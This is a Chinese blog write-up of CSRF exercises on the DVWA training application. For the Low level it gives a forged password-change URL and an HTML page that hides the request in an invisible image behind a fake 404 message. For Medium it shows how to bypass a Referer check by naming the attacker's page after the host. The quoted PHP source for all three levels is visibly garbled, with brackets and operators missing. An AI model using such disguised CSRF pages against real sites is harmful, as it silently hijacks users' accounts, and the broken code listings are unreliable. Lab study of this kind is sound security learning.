DVWA之CSRF学习

DVWA之CSRF学习

 

CSRF攻击过程及分析

Low级别

DVWA之CSRF学习_第1张图片

首先,抓包看一下改密码的传输都有哪些

DVWA之CSRF学习_第2张图片

 

得知URL为:

http://用户的ip/DVWA-1.9/vulnerabilities/csrf/?password_new=输的新密码&password_conf=输的确认密码&Change=Change#

 

当用户A在访问该网站时,只要用户A点击黑客B精心构造的这个URL时就能造成CSRF攻击

 

构造链接:http://192.168.244.131/DVWA-1.9/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change#

 

LOW级别源码如下:



if( isset( $_GET'Change' ] ) ) {
    // Get input
    $pass_new  $_GET'password_new' ];
    $pass_conf $_GET'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new mysql_real_escape_string$pass_new );
        $pass_new md5$pass_new );

        // Update the database
        $insert "UPDATE `users` SET password = '$pass_new' WHERE user = '" dvwaCurrentUser() . "';";
        $result mysql_query$insert ) or die( '

mysql_error() . '
);

        // Feedback for the user
        echo "
Password Changed.
"
;
    }
    else {
        // Issue with passwords matching
        echo "
Passwords did not match.
"
;
    }

    mysql_close();
}

?>

发现以上源码并没有加入任何的过滤和验证,所以可以说是没有防护

 

当然,这个URL过于明显,稍微有一点知识的人都能看出来这是一个改密码的链接,所以说我们就应该想一下隐藏的放法,比如构造一个HTML文档

文档如下:

 

Test.html

<imgsrc=" http://192.168.244.131/DVWA-1.9/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change#"border="0"style="display:none;"/>

<h1>404<h1>

<h2>file notfound.<h2>

其中style="display:none;"是不让这个元素显示出来

 

DVWA之CSRF学习_第3张图片

当用户打开这个HTML时,以为这是个错误的页面,一般不会在意,但是这样就能把用户的密码改掉了,

DVWA之CSRF学习_第4张图片

发现密码错误

再试一下改过的密码

DVWA之CSRF学习_第5张图片

登陆成功

Medium CSRF

DVWA之CSRF学习_第6张图片

同样,我们先抓包看一下改密码的请求有什么不同

DVWA之CSRF学习_第7张图片

看一下它的源码:

 



if( isset( $_GET'Change' ] ) ) {
    // Checks to see where the request came from
    if( eregi$_SERVER'SERVER_NAME' ], $_SERVER'HTTP_REFERER' ] ) ) {
        // Get input
        $pass_new  $_GET'password_new' ];
        $pass_conf $_GET'password_conf' ];

        // Do the passwords match?
        if( $pass_new == $pass_conf ) {
            // They do!
            $pass_new mysql_real_escape_string$pass_new );
            $pass_new md5$pass_new );

            // Update the database
            $insert "UPDATE `users` SET password = '$pass_new' WHERE user = '" dvwaCurrentUser() . "';";
            $result mysql_query$insert ) or die( '

mysql_error() . '
);

            // Feedback for the user
            echo "
Password Changed.
"
;

        }
        else {
            
// Issue with passwords matching
            echo "
Passwords did not match.
"
;

        }
    }
    else {
        
// Didn't come from a trusted source
        echo "
That request didn't look correct.
"
;

    }

    
mysql_close();
}

?>

 

发现源码里多了一个这样的对比: if( eregi$_SERVER'SERVER_NAME' ], $_SERVER'HTTP_REFERER' ] ) )

是匹配主机名字的,如果主机名与发起请求的名字一样的时候,就可以完成改密码的攻击

那么我们可以构造这样的一个HTML  用户A的主机IP地址为192.168.244.131

192.168.244.131.html  这个网页需要放在攻击者的服务器中

 

内容如下:

404

file not found.

 

其中style="display:none;"是不让这个元素显示出来

我们把这个文件放在攻击主机上网站根目录下

DVWA之CSRF学习_第8张图片

然后在攻击主机上去访问这个文件

DVWA之CSRF学习_第9张图片

当用户在用密码password登录时发现已经登不上去了

DVWA之CSRF学习_第10张图片

 

High CSRF



if( isset( $_GET'Change' ] ) ) {
    // Check Anti-CSRF token
    checkToken$_REQUEST'user_token' ], $_SESSION'session_token' ], 'index.php' );

    // Get input
    $pass_new  $_GET'password_new' ];
    $pass_conf $_GET'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new mysql_real_escape_string$pass_new );
        $pass_new md5$pass_new );

        // Update the database
        $insert "UPDATE `users` SET password = '$pass_new' WHERE user = '" dvwaCurrentUser() . "';";
        $result mysql_query$insert ) or die( '

mysql_error() . '
);

        // Feedback for the user
        echo "
Password Changed.
"
;

    }
    else {
        
// Issue with passwords matching
        echo "
Passwords did not match.
"
;

    }

    
mysql_close();
}

// Generate Anti-CSRF token
generateSessionToken();

?>

 

你可能感兴趣的:(web攻防)